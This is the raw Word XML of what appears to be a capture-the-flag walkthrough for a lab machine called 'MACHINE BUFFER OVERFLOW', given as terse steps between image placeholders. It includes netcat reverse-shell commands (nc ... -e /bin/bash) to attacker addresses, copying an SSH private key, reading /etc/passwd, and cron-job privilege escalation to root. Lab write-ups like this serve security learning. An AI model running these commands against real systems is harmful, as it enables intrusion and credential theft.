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EFCE3" w14:textId="10F23C78" w:rsidR="003079CB" w:rsidRPr="003079CB" w:rsidRDefault="003079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79CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MACHINE BUFFER OVERFLOW </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380679B9" w14:textId="6B787589" w:rsidR="003079CB" w:rsidRPr="003079CB" w:rsidRDefault="003079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4205FA" w14:textId="5DE99074" w:rsidR="003079CB" w:rsidRPr="003079CB" w:rsidRDefault="003079CB" w:rsidP="003079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079CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap Scanning </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64578CCD" w14:textId="5CE3B2B7" w:rsidR="003079CB" w:rsidRDefault="003079CB" w:rsidP="003079CB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50FABE6D" wp14:editId="4F1D948F">
            <wp:extent cx="5684520" cy="2958016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61" cy="295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264C0A52" w14:textId="65D785D5" w:rsidR="003079CB" w:rsidRPr="003079CB" w:rsidRDefault="003079CB" w:rsidP="003079C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079CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Port 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DA9CB8" w14:textId="7BB118D7" w:rsidR="003079CB" w:rsidRDefault="003079CB" w:rsidP="003079CB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170FE581" wp14:editId="2E408167">
            <wp:extent cx="5940425" cy="1630680"/>
            <wp:effectExtent l="0" t="0" r="3175" b="762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FACC" w14:textId="5D5F780F" w:rsidR="003079CB" w:rsidRDefault="003079CB" w:rsidP="003079CB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22DBBBC8" wp14:editId="5C5C5616">
            <wp:extent cx="5082540" cy="2125376"/>
            <wp:effectExtent l="0" t="0" r="3810" b="825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2500" cy="212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DD122" w14:textId="63C9D13C" w:rsidR="003079CB" w:rsidRDefault="003079CB" w:rsidP="003079CB">
      <w:pPr>
        <w:pStyle w:val="a3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14DC3F4" wp14:editId="03A3E21E">
            <wp:extent cx="5940425" cy="2156460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DA84" w14:textId="42D2EA46" w:rsidR="001D01E2" w:rsidRDefault="001D01E2" w:rsidP="003079CB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="307249E9" w14:textId="642C1F62" w:rsidR="001D01E2" w:rsidRDefault="001D01E2" w:rsidP="003079C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1D01E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D01E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0BBCE060" w14:textId="4B03D7BE" w:rsidR="001D01E2" w:rsidRPr="001D01E2" w:rsidRDefault="001D01E2" w:rsidP="003079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D01E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0987654321098765432109876543210987654321nc\ 10.0.2.14\ 1234\ -e\ /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C78839" w14:textId="4894E3D1" w:rsidR="001D01E2" w:rsidRDefault="001D01E2" w:rsidP="003079CB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314875A7" wp14:editId="4B92339D">
            <wp:extent cx="5940425" cy="15665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B114" w14:textId="18CE1A06" w:rsidR="001D01E2" w:rsidRDefault="001D01E2" w:rsidP="003079C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 cd var/www/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ssl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secure_notes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4E0E534" w14:textId="452E00D1" w:rsidR="001D01E2" w:rsidRDefault="001D01E2" w:rsidP="003079C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 strings secure.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E234FC" w14:textId="2ACE4166" w:rsidR="001D01E2" w:rsidRDefault="001D01E2" w:rsidP="003079C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copy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id_rsa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key and auth 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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C3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3878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="002C3878">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 600 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C3878">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id_rsa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780B28A" w14:textId="4E936D24" w:rsidR="001D01E2" w:rsidRDefault="001D01E2" w:rsidP="003079C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 cat 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/passwd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0690AF17" w14:textId="08CEDCB7" w:rsidR="001D01E2" w:rsidRDefault="001D01E2" w:rsidP="003079C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EB402B6" wp14:editId="4913D113">
            <wp:extent cx="5940425" cy="1812290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1BC5" w14:textId="149703BA" w:rsidR="001D01E2" w:rsidRDefault="002C3878" w:rsidP="003079C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User:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E81DDFB" w14:textId="0076B391" w:rsidR="002C3878" w:rsidRDefault="002C3878" w:rsidP="003079C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47B1B5E" wp14:editId="61D5C5BB">
            <wp:extent cx="3276600" cy="57150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C30C" w14:textId="015D57F7" w:rsidR="002C3878" w:rsidRDefault="002C3878" w:rsidP="002C38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Getting pspy64 </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="0043410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https://github.com/DominicBreuker/pspy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5BB327E3" w14:textId="2E1BE09C" w:rsidR="002C3878" w:rsidRDefault="002C3878" w:rsidP="002C38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E848BAC" w14:textId="58F4A791" w:rsidR="002C3878" w:rsidRPr="004B5274" w:rsidRDefault="004B5274" w:rsidP="002C387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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CCD55EB" wp14:editId="0601649E">
            <wp:extent cx="5600700" cy="2653373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3594" cy="265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AE61" w14:textId="586D9003" w:rsidR="002C3878" w:rsidRDefault="002C3878" w:rsidP="002C387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3A9595" w14:textId="1EE9BDD1" w:rsidR="002C3878" w:rsidRDefault="004B5274" w:rsidP="002C3878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14" w:history="1">
        <w:r w:rsidRPr="0043410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https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/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- creation resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0823C974" w14:textId="22B7FC98" w:rsidR="004B5274" w:rsidRDefault="004B5274" w:rsidP="002C38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7621B4E" wp14:editId="61388A73">
            <wp:extent cx="5204460" cy="1768014"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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1702" cy="177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F075" w14:textId="320BE52B" w:rsidR="002C3878" w:rsidRDefault="002C3878" w:rsidP="002C387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C3878">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C3878">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.5 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C3878">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1234  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C3878">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C3878"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  <w:r w:rsidR="004B5274"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proofErr w:type="spellStart"/>
      <w:r w:rsidR="004B5274">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B5274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="004B5274">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B5274">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444 on the attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B504BB1" w14:textId="77777777" w:rsidR="004B5274" w:rsidRDefault="004B5274" w:rsidP="002C38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C484D28" wp14:editId="1DC8A405">
            <wp:extent cx="5151120" cy="1593516"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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1363" cy="159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7242" w14:textId="4828ABB6" w:rsidR="004B5274" w:rsidRDefault="004B5274" w:rsidP="002C38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Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391875AA" w14:textId="6A4C3307" w:rsidR="004B5274" w:rsidRDefault="004B5274" w:rsidP="002C38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082B04B" wp14:editId="1C677BDA">
            <wp:extent cx="3520440" cy="1198304"/>
            <wp:effectExtent l="0" t="0" r="3810" b="190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4678" cy="120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2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729B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA7079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743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CB"/>
    <w:rsid w:val="001D01E2"/>
    <w:rsid w:val="002C3878"/>
    <w:rsid w:val="003079CB"/>
    <w:rsid w:val="004B5274"/>
    <w:rsid w:val="00AA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004ED"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{20BE4385-729E-44C9-B69F-CDC7C56A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9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C387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C38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DominicBreuker/pspy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hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-job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bakassarina bakassarina</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>bakassarina bakassarina</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-06T05:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-06T06:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>